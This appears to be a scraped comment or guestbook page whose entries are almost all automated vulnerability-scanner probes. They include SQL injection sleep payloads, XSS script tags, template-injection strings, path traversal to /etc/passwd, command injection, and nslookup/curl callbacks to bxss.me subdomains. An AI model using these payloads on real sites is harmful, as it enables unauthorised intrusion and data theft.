1}#{98991*97996*98991*97996}

image
HfjNUlYZ
12/01/2024

1}}dfb{{'abcd'.toUpperCase()}}xca

image
HfjNUlYZ
12/01/2024

1<body onload=keuE(9917)>

image
HfjNUlYZ
12/01/2024

1\u003CScRiPt\keuE(9783)\u003C/sCripT\u003E

image
HfjNUlYZ
12/01/2024

1<a6qaqGS x=9146>

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
XcwJRDFY
12/01/2024

2OeF4xxF'; waitfor delay '0:0:15' --

image
comment
12/01/2024

1

image
6EqSGpa2') OR 702=(SELECT 702 FROM PG_SLEEP(15))--
12/01/2024

1

image
XcwJRDFY
12/01/2024

bfg9561<s1﹥s2ʺs3ʹhjl9561

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >rzzs(9661)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
VmRBaGo0eko=
12/01/2024

1

image
HfjNUlYZ
12/01/2024

19052438

image
XcwJRDFY
12/01/2024

echo qfcexj$()\ papzcu\nz^xyu||a #' &echo qfcexj$()\ papzcu\nz^xyu||a #|" &echo qfcexj$()\ papzcu\nz^xyu||a #

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY9911308
12/01/2024

1

image
XcwJRDFY
12/01/2024

&echo yjolea$()\ fhdsvn\nz^xyu||a #' &echo yjolea$()\ fhdsvn\nz^xyu||a #|" &echo yjolea$()\ fhdsvn\nz^xyu||a #

image
XcwJRDFY
12/01/2024

1|echo srhqep$()\ gknspd\nz^xyu||a #' |echo srhqep$()\ gknspd\nz^xyu||a #|" |echo srhqep$()\ gknspd\nz^xyu||a #

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bfg2479<s1﹥s2ʺs3ʹhjl2479

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"()

image
XcwJRDFY
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'&&sleep(27*1000)*alfpev&&'

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
HfjNUlYZ
12/01/2024

dfb{@98991*97996}xca

image
XcwJRDFY
12/01/2024

2VT9BMFY'); waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

dfb{{=98991*97996}}xca

image
XcwJRDFY
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1 bcc:0.706-28867.706.d6b6d.19734.2@bxss.me

image
to@example.com> bcc:0.706-28870.706.d6b6d.19734.2@bxss.me
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{"abc"|title}}xca

image
XcwJRDFY
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
';print(md5(31337));$a='
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(117).concat(85).concat(122).concat(85)+(require"socket" Socket.gethostbyname("hitns"+"ojzqvmakdfde3.bxss.me.")[3].to_s)+"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{@math key=98991 method="multiply" operand=97996/}xca

image
XcwJRDFY
12/01/2024

comment

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
'.print(md5(31337)).'
12/01/2024

1

image
XcwJRDFY
12/01/2024

xfs.bxss.me

image
HYHwS6L0
12/01/2024

1

image
HfjNUlYZ
12/01/2024

#{98991*97996*98991*97996}

image
comment
12/01/2024

1

image
-1 OR 2+224-224-1=0+0+0+1 --
12/01/2024

1

image
comment/.
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{'abcd'.toUpperCase()}}xca

image
<!--
12/01/2024

1

image
Yb7604vw'; waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
1'"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<script>ebK6(9623)</script>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

<th:t="${dfb}#foreach

image
HfjNUlYZ
12/01/2024

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9677'>

image
HfjNUlYZ
12/01/2024

%31%3C%53%63%52%69%50%74%20%3E%65%62%4B%36%289492%29%3C%2F%73%43%72%69%70%54%3E

image
HfjNUlYZ
12/01/2024

1\u003CScRiPt\ebK6(9108)\u003C/sCripT\u003E

image
HfjNUlYZ
12/01/2024

1g9U5p <ScRiPt >ebK6(9766)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1<ifRAme sRc=9115.com></IfRamE>

image
HfjNUlYZ
12/01/2024

1<at4KGkC<

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
'"()&%<zzz><ScRiPt >l2fA(9903)</ScRiPt>
12/01/2024

1

image
"}dfb${98991*97996}xca
12/01/2024

1

image
"}dfb{{"abc"|title}}xca
12/01/2024

1

image
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
1}}dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<script>LMJS(9914)</script>9914
12/01/2024

1

image
XcwJRDFY<ScRiPt >LMJS(9732)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9477></ScRiPt>
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9493'>
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\LMJS(9189)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY<WX3ED7>HP03V[!+!]</WX3ED7>
12/01/2024

1

image
XcwJRDFY
12/01/2024

'+response.write(9850563*9358508)+'

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

echo sfmqzi$()\ bkszal\nz^xyu||a #' &echo sfmqzi$()\ bkszal\nz^xyu||a #|" &echo sfmqzi$()\ bkszal\nz^xyu||a #

image
XcwJRDFY
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
XcwJRDFY
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
&echo zhdust$()\ vkatdc\nz^xyu||a #' &echo zhdust$()\ vkatdc\nz^xyu||a #|" &echo zhdust$()\ vkatdc\nz^xyu||a #
12/01/2024

1

image
(nslookup -q=cname hitiobogogrtk2b075.bxss.me||curl hitiobogogrtk2b075.bxss.me))
12/01/2024

1

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
XcwJRDFY
12/01/2024

!(()&&!|*|*|

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
XcwJRDFY
12/01/2024

".gethostbyname(lc("hitva"."bvgblolob6c4e.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(81).chr(120).chr(86)."

image
XcwJRDFY
12/01/2024

to@example.com> bcc:0.698-6522.698.fa28e.19734.2@bxss.me

image
XcwJRDFY
12/01/2024

";print(md5(31337));$a="

image
${@print(md5(31337))}
12/01/2024

1

image
comment
12/01/2024

1

image
'"()
12/01/2024

1

image
'"
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY
12/01/2024

1</script><script>Vynf(9754)</script>

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

response.write(9536718*9470067)

image
XcwJRDFY
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
XcwJRDFY
12/01/2024

HSESm5gs

image
XcwJRDFY
12/01/2024

-1 OR 2+46-46-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
XcwJRDFY
12/01/2024

1|echo fdxbhb$()\ nufudl\nz^xyu||a #' |echo fdxbhb$()\ nufudl\nz^xyu||a #|" |echo fdxbhb$()\ nufudl\nz^xyu||a #

image
&nslookup -q=cname hitwwwdfwbojq66d66.bxss.me&'\"`0&nslookup -q=cname hitwwwdfwbojq66d66.bxss.me&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
&(nslookup -q=cname hithdbkrbdikk17db4.bxss.me||curl hithdbkrbdikk17db4.bxss.me)&'\"`0&(nslookup -q=cname hithdbkrbdikk17db4.bxss.me||curl hithdbkrbdikk17db4.bxss.me)&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
${9999449+10000173}
12/01/2024

1

image
-1' OR 2+163-163-1=0+0+0+1 or 'AD4b4bg3'='
12/01/2024

1

image
tbo1FKIC')) OR 998=(SELECT 998 FROM PG_SLEEP(15))--
12/01/2024

1

image
/etc/shells
12/01/2024

1

image
c:/windows/win.ini
12/01/2024

1

image
@@CLIcf
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(104).concat(79).concat(101).concat(84)+(require"socket" Socket.gethostbyname("hituc"+"iibieylx45a0d.bxss.me.")[3].to_s)+"
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(115).concat(77).concat(110).concat(89)+(require'socket' Socket.gethostbyname('hitdp'+'yuxkaxdr91978.bxss.me.')[3].to_s)+'
12/01/2024

1

image
comment
12/01/2024

1

image
XcwJRDFY
12/01/2024

<!--

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
13/01/2024

1

image
../XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

&nslookup -q=cname hithxlkjoqrmx2456d.bxss.me&'\"`0&nslookup -q=cname hithxlkjoqrmx2456d.bxss.me&`'

image
XcwJRDFY
13/01/2024

|(nslookup -q=cname hityfzmhhqpyb8522a.bxss.me||curl hityfzmhhqpyb8522a.bxss.me)

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

http://bxss.me/t/fit.txt?.jpg

image
XcwJRDFY|echo xacosl$()\ wuufzm\nz^xyu||a #' |echo xacosl$()\ wuufzm\nz^xyu||a #|" |echo xacosl$()\ wuufzm\nz^xyu||a #
13/01/2024

1

image
XcwJRDFY
13/01/2024

'.gethostbyname(lc('hityr'.'zdbipidf10ca6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(76).chr(103).chr(83).'

image
XcwJRDFY
13/01/2024

-1 OR 2+516-516-1=0+0+0+1

image
".gethostbyname(lc("hitdb"."gpsswfap45c0e.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(89).chr(122).chr(74)."
13/01/2024

1

image
XcwJRDFY
13/01/2024

-1" OR 2+350-350-1=0+0+0+1 --

image
XcwJRDFY"&&sleep(27*1000)*pwpkoj&&"
13/01/2024

1

image
XcwJRDFY'||sleep(27*1000)*wsfgyv||'
13/01/2024

1

image
XcwJRDFY
13/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
${@print(md5(31337))}\
13/01/2024

1

image
XcwJRDFY
13/01/2024

comment/.

image
XcwJRDFY
13/01/2024

Hzy0qfuw')); waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

19627554

image
XcwJRDFY
13/01/2024

27PIq9Rj') OR 275=(SELECT 275 FROM PG_SLEEP(15))--

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
13/01/2024

1

image
1 waitfor delay '0:0:15' --
13/01/2024

1

image
74Tv629i'; waitfor delay '0:0:15' --
13/01/2024

1

image
cfwWlJTj' OR 457=(SELECT 457 FROM PG_SLEEP(15))--
13/01/2024

1

image
PzsiRfWN') OR 264=(SELECT 264 FROM PG_SLEEP(15))--
13/01/2024

1

image
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
13/01/2024

1

image
1'"
13/01/2024

1

image
XcwJRDFY
13/01/2024

dfb{{98991*97996}}xca

image
XcwJRDFY
13/01/2024

dfb__${98991*97996}__::.x

image
XcwJRDFY9170263
13/01/2024

1

image
<th:t="${dfb}#foreach
13/01/2024

1

image
dfb{{98991*97996}}xca
13/01/2024

1

image
dfb#{98991*97996}xca
13/01/2024

1

image
dfb@(98991*97996)xca
13/01/2024

1

image
dfb{@math key=98991 method="multiply" operand=97996/}xca
13/01/2024

1

image
dfb{{{this}}}xca
13/01/2024

1

image
dfb__${98991*97996}__::.x
13/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
13/01/2024

1

image
%58%63%77%4A%52%44%46%59%39%32%37%30%22%28%29%3B%7D%5D%39%38%33%37
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

../1

image
XcwJRDFY
13/01/2024

1&echo ttmnsj$()\ dbpuvp\nz^xyu||a #' &echo ttmnsj$()\ dbpuvp\nz^xyu||a #|" &echo ttmnsj$()\ dbpuvp\nz^xyu||a #

image
XcwJRDFY
13/01/2024

1

image
echo iwncmp$()\ vduerk\nz^xyu||a #' &echo iwncmp$()\ vduerk\nz^xyu||a #|" &echo iwncmp$()\ vduerk\nz^xyu||a #
13/01/2024

1

image
XcwJRDFY
13/01/2024

)

image
(nslookup -q=cname hitegolzygldd544f3.bxss.me||curl hitegolzygldd544f3.bxss.me))
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

!(()&&!|*|*|

image
XcwJRDFY
13/01/2024

/etc/shells

image
XcwJRDFY
13/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
XcwJRDFY
13/01/2024

-1); waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

'.gethostbyname(lc('hityp'.'uajjibuu8d801.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(88).chr(101).chr(65).'

image
XcwJRDFY
13/01/2024

".gethostbyname(lc("hitfo"."ectixzer20cdf.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(83).chr(115).chr(72)."

image
Http://bxss.me/t/fit.txt
13/01/2024

1

image
XcwJRDFY
13/01/2024

1 waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

Jx9mGJyV'; waitfor delay '0:0:15' --

image
".gethostbyname(lc("hitwe"."svuluxdr3210e.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(79).chr(99).chr(75)."
13/01/2024

1

image
/etc/shells
13/01/2024

1

image
XcwJRDFY
13/01/2024

-1)) OR 240=(SELECT 240 FROM PG_SLEEP(15))--

image
XcwJRDFY
13/01/2024

1'||sleep(27*1000)*oocjrn||'

image
XcwJRDFY
13/01/2024

1'"

image
XcwJRDFY'||sleep(27*1000)*hbkdcj||'
13/01/2024

1

image
XcwJRDFY
13/01/2024

@@Ma1Ng

image
bxss.me/t/xss.html?%00
13/01/2024

1

image
XcwJRDFY
13/01/2024

"+"A".concat(70-3).concat(22*4).concat(116).concat(80).concat(110).concat(86)+(require"socket" Socket.gethostbyname("hitvi"+"thxegltx35eae.bxss.me.")[3].to_s)+"

image
XcwJRDFY
13/01/2024

comment

image
-1' OR 2+966-966-1=0+0+0+1 or 'iXeQ03CL'='
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
<%={{={@{#{${dfb}}%>
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

19702958

image
10KSetnZxO
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
SG92dGxlWXM=
13/01/2024

1

image
response.write(9935354*9448393)
13/01/2024

1

image
XcwJRDFY|echo ydlong$()\ bsryur\nz^xyu||a #' |echo ydlong$()\ bsryur\nz^xyu||a #|" |echo ydlong$()\ bsryur\nz^xyu||a #
13/01/2024

1

image
XcwJRDFY
13/01/2024

http://bxss.me/t/fit.txt?.jpg

image
XcwJRDFY
13/01/2024

-1' OR 2+449-449-1=0+0+0+1 or 'hdYS1YdC'='

image
XcwJRDFY
13/01/2024

";print(md5(31337));$a="

image
XcwJRDFY
13/01/2024

-1); waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

1"||sleep(27*1000)*sbymfj||"

image
XcwJRDFY
13/01/2024

1 waitfor delay '0:0:15' --

image
comment
13/01/2024

1

image
XcwJRDFY'&&sleep(27*1000)*gccvaa&&'
13/01/2024

1

image
XcwJRDFY
13/01/2024

U8lqWpA0')); waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

1

image
-1 OR 2+884-884-1=0+0+0+1
13/01/2024

1

image
yFWh9kjx')); waitfor delay '0:0:15' --
13/01/2024

1

image
dfb__${98991*97996}__::.x
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
'"()&%<zzz><ScRiPt >ln1Y(9790)</ScRiPt>
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY9083636
13/01/2024

1

image
XcwJRDFY
13/01/2024

'+response.write(9722578*9675228)+'

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

-1 OR 2+225-225-1=0+0+0+1

image
XcwJRDFY
13/01/2024

"+response.write(9722578*9675228)+"

image
XcwJRDFY
13/01/2024

mcoPOYw5')); waitfor delay '0:0:15' --

image
XcwJRDFY
13/01/2024

-1)) OR 90=(SELECT 90 FROM PG_SLEEP(15))--

image
XcwJRDFY
13/01/2024

c:/windows/win.ini

image
http://bxss.me/t/fit.txt?.jpg
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

".gethostbyname(lc("hitrs"."oyelwbsfd7064.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(65).chr(105).chr(84)."

image
TqLwyASL'); waitfor delay '0:0:15' --
13/01/2024

1

image
";print(md5(31337));$a="
13/01/2024

1

image
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
1'"
13/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

1

image
XcwJRDFY
13/01/2024

"%}dfb{{98991*97996}}xca

image
XcwJRDFY
13/01/2024

"}dfb#{98991*97996}xca

image
XcwJRDFY
13/01/2024

"%>dfb<%=98991*97996%>xca

image
XcwJRDFY
13/01/2024

"}dfb{{"abc"|title}}xca

image
XcwJRDFY
13/01/2024

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

image
XcwJRDFY
13/01/2024

"}dfb#{xca}=123

image
XcwJRDFY
13/01/2024

"}dfb[[${98991*97996}]]xca

image
XcwJRDFY
13/01/2024

"dfb__${98991*97996}__::.x

image
XcwJRDFY
13/01/2024

'}dfb${98991*97996}xca

image
XcwJRDFY
13/01/2024

'98991*97996*98991*97996

image
XcwJRDFY
13/01/2024

'}#{98991*97996*98991*97996}

image
XcwJRDFY
13/01/2024

1%>dfb<%=98991*97996%>xca

image
XcwJRDFY
13/01/2024

1}dfb#set($x=98991*97996)${x}xca

image
XcwJRDFY
13/01/2024

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY
13/01/2024

1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9488></ScRiPt>

image
XcwJRDFY
13/01/2024

<a HrEF=jaVaScRiPT:>

image
XcwJRDFY
13/01/2024

1<WPIKHH>M9V99[!+!]</WPIKHH>

image
XcwJRDFY9379376
13/01/2024

1

image
wUmrLVWz
08/03/2024

1

image
WkYxnTGh
09/03/2024

1

image
fnfOzvSR
10/04/2024

1

image
fnfOzvSR
10/04/2024

1

image
fnfOzvSR
10/04/2024

1

image
fnfOzvSR
11/04/2024

1

image
fnfOzvSR
11/04/2024

1

image
fnfOzvSR
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

1hcLk5K2O

image
1Ndh5YoGO
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

response.write(9944635*9960343)

image
RDFYjolf
11/04/2024

'+response.write(9944635*9960343)+'

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

"+response.write(9944635*9960343)+"

image
response.write(9562499*9648926)
11/04/2024

1

image
'+response.write(9562499*9648926)+'
11/04/2024

1

image
"+response.write(9562499*9648926)+"
11/04/2024

1

image
RDFYjolf
11/04/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
RDFYjolf<esi:include src="http://bxss.me/rpb.png"/>
11/04/2024

1

image
RDFYjolf
11/04/2024

1 bcc:0.13832-6806.13832.42780.19824.2@bxss.me

image
RDFYjolf
11/04/2024

to@example.com> bcc:0.13832-6807.13832.42780.19824.2@bxss.me

image
RDFYjolf bcc:0.13832-6808.13832.42780.19824.2@bxss.me
11/04/2024

1

image
to@example.com> bcc:0.13832-6809.13832.42780.19824.2@bxss.me
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

../../../../../../../../../../../../../../etc/passwd

image
RDFYjolf
11/04/2024

../../../../../../../../../../../../../../windows/win.ini

image
RDFYjolf
11/04/2024

file:///etc/passwd

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

../1

image
../../../../../../../../../../../../../../etc/passwd
11/04/2024

1

image
RDFYjolf
11/04/2024

wvD3iwUt

image
../../../../../../../../../../../../../../windows/win.ini
11/04/2024

1

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

-1 OR 2+702-702-1=0+0+0+1 --

image
file:///etc/passwd
11/04/2024

1

image
RDFYjolf
11/04/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
RDFYjolf
11/04/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
11/04/2024

1

image
RDFYjolf
11/04/2024

-1 OR 2+240-240-1=0+0+0+1

image
RDFYjolf
11/04/2024

-1' OR 2+677-677-1=0+0+0+1 --

image
../RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

-1' OR 2+341-341-1=0+0+0+1 or 'fvFM5r5Y'='

image
RDFYjolf
11/04/2024

-1" OR 2+624-624-1=0+0+0+1 --

image
RDFYjolf
11/04/2024

if(now()=sysdate(),sleep(15),0)

image
RDFYjolf
11/04/2024

0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z

image
RDFYjolf
11/04/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
RDFYjolf
11/04/2024

${9999492+9999532}

image
RDFYjolf
11/04/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
${10000149+9999391}
11/04/2024

1

image
RDFYjolf
11/04/2024

-1; waitfor delay '0:0:15' --

image
RDFYjolf
11/04/2024

-1); waitfor delay '0:0:15' --

image
RDFYjolf
11/04/2024

-1)); waitfor delay '0:0:15' --

image
RDFYjolf
11/04/2024

1Ex9WTLC'; waitfor delay '0:0:15' --

image
dXJKWDZodGw=
11/04/2024

1

image
RDFYjolf
11/04/2024

86Xciers'); waitfor delay '0:0:15' --

image
RDFYjolf
11/04/2024

m7wlGs1N')); waitfor delay '0:0:15' --

image
RDFYjolf
11/04/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
RDFYjolf
11/04/2024

-5 OR 905=(SELECT 905 FROM PG_SLEEP(15))--

image
RDFYjolf
11/04/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
RDFYjolf
11/04/2024

1

image
RDFYjolf
11/04/2024

-5) OR 141=(SELECT 141 FROM PG_SLEEP(15))--

image
RDFYjolf
11/04/2024

Http://bxss.me/t/fit.txt

image
RDFYjolf
11/04/2024

-1)) OR 118=(SELECT 118 FROM PG_SLEEP(15))--

image
RDFYjolf
11/04/2024

http://bxss.me/t/fit.txt?.jpg

image
RDFYjolf
11/04/2024

)

image
RDFYjolf
11/04/2024

uTJnTtl7' OR 278=(SELECT 278 FROM PG_SLEEP(15))--

image
RDFYjolf
11/04/2024

/etc/shells

image
RDFYjolf
11/04/2024

!(()&&!|*|*|

image
RDFYjolf
11/04/2024

ruRHnLj1') OR 136=(SELECT 136 FROM PG_SLEEP(15))--

image
fnfOzvSR
11/04/2024

1

image
fnfOzvSR
11/04/2024

1

image
fnfOzvSR
11/04/2024

1

image
lxbfYeaa
14/05/2024

1

image
lxbfYeaa
14/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
lxbfYeaa
15/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
'+response.write(9918998*9962306)+'
23/06/2024

1

image
GRLpGpAG
23/06/2024

1 bcc:074625.16571-6543.16571.9161c.19897.2@bxss.me

image
GRLpGpAG
23/06/2024

${9999159+9999827}

image
${9999888+9999448}
23/06/2024

1

image
GRLpGpAG
23/06/2024

$(nslookup -q=cname hitskjowarqasb1937.bxss.me||curl hitskjowarqasb1937.bxss.me)

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
GRLpGpAG
23/06/2024

/etc/shells

image
GRLpGpAG&echo qurgcv$()\ flesjh\nz^xyu||a #' &echo qurgcv$()\ flesjh\nz^xyu||a #|" &echo qurgcv$()\ flesjh\nz^xyu||a #
23/06/2024

1

image
GRLpGpAG
23/06/2024

..\..\..\..\..\..\..\..\windows\win.ini

image
GRLpGpAG
23/06/2024

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
23/06/2024

1

image
http://bxss.me/t/fit.txt?.jpg
23/06/2024

1

image
GRLpGpAG
23/06/2024

WEB-INF\web.xml

image
../../../../../../../../../../../../../../etc/passwd
23/06/2024

1

image
pHqghUme bcc:074625.16572-7503.16572.4f2db.19897.2@bxss.me
23/06/2024

1

image
GRLpGpAG
23/06/2024

-1' OR 2+631-631-1=0+0+0+1 --

image
pHqghUme
23/06/2024

file:///etc/passwd

image
pHqghUme
23/06/2024

|echo qkryex$()\ xvafpq\nz^xyu||a #' |echo qkryex$()\ xvafpq\nz^xyu||a #|" |echo qkryex$()\ xvafpq\nz^xyu||a #

image
pHqghUme
23/06/2024

(nslookup -q=cname hitxkhnvwvzugdbb9c.bxss.me||curl hitxkhnvwvzugdbb9c.bxss.me))

image
echo gygbif$()\ ddykyw\nz^xyu||a #' &echo gygbif$()\ ddykyw\nz^xyu||a #|" &echo gygbif$()\ ddykyw\nz^xyu||a #
23/06/2024

1

image
pHqghUme
23/06/2024

)

image
pHqghUme
23/06/2024

c:/windows/win.ini

image
|(nslookup -q=cname hitotlafvqxtx0fa00.bxss.me||curl hitotlafvqxtx0fa00.bxss.me)
23/06/2024

1

image
